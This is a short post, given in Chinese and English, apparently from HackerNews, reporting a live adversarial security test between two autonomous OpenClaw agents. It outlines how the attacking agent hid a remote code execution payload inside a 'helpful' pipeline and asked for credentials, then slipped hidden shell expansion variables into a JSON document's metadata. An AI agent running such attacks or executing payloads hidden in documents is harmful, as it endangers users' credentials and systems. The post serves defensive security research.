HackerNews中文版

我们进行了一个基于OpenClaw构建的两个自主AI代理之间的实时对抗安全测试。其中一个代理充当红队攻击者，另一个代理则充当标准防御代理。一旦会话开始，就没有人类参与。代理通过Webhook直接使用真实凭证和工具进行通信。测试的目标是评估三个在实践中常常会破坏自主系统的风险维度：访问、暴露和代理性。攻击者首先尝试了经典的社会工程学攻击。它提供了一个“有帮助”的安全管道，隐藏了一个远程代码执行的有效载荷，并请求凭证。防御代理正确识别了其意图并阻止了执行。随后，攻击者转向了间接攻击。它没有直接要求代理运行代码，而是要求代理审查一个包含隐藏的shell扩展变量的JSON文档。这个有效载荷成功传递，目前仍在分析中。主要结论是，直接攻击相对容易防御，而通过文档、模板和内存进行的间接执行路径则要困难得多。本报告并不声称安全性。它是一次可观察性实验，旨在揭示代理之间交互中的真实失败模式，我们预计随着自主系统的广泛部署，这种情况将变得更加普遍。完整报告请见： https://gobrane.com/observing-adversarial-ai-lessons-from-a-live-openclaw-agent-security-audit/欢迎就设置、方法论或发现结果提出技术问题。

查看原文

We ran a live adversarial security test between two autonomous AI agents built on OpenClaw.One agent acted as a red team attacker. One agent acted as a standard defensive agent.No humans were involved once the session started. The agents communicated directly over webhooks with real credentials and tooling access.The goal was to test three risk dimensions that tend to break autonomous systems in practice: access, exposure, and agency.The attacker first attempted classic social engineering. It offered a “helpful” security pipeline that hid a remote code execution payload and requested credentials. The defending agent correctly identified the intent and blocked execution.The attacker then pivoted to an indirect attack. Instead of asking the agent to run code, it asked the agent to review a JSON document with hidden shell expansion variables embedded in metadata. This payload was delivered successfully and is still under analysis.The main takeaway is that direct attacks are relatively easy to defend against. Indirect execution paths through documents, templates, and memory are much harder.This report is not a claim of safety. It is an observability exercise intended to surface real failure modes in agent-to-agent interaction, which we expect to become common as autonomous systems are deployed more widely.Full report here: https://gobrane.com/observing-adversarial-ai-lessons-from-a-live-openclaw-agent-security-audit/Happy to answer technical questions about the setup, methodology, or findings.

当OpenClaw代理相互攻击时会发生什么？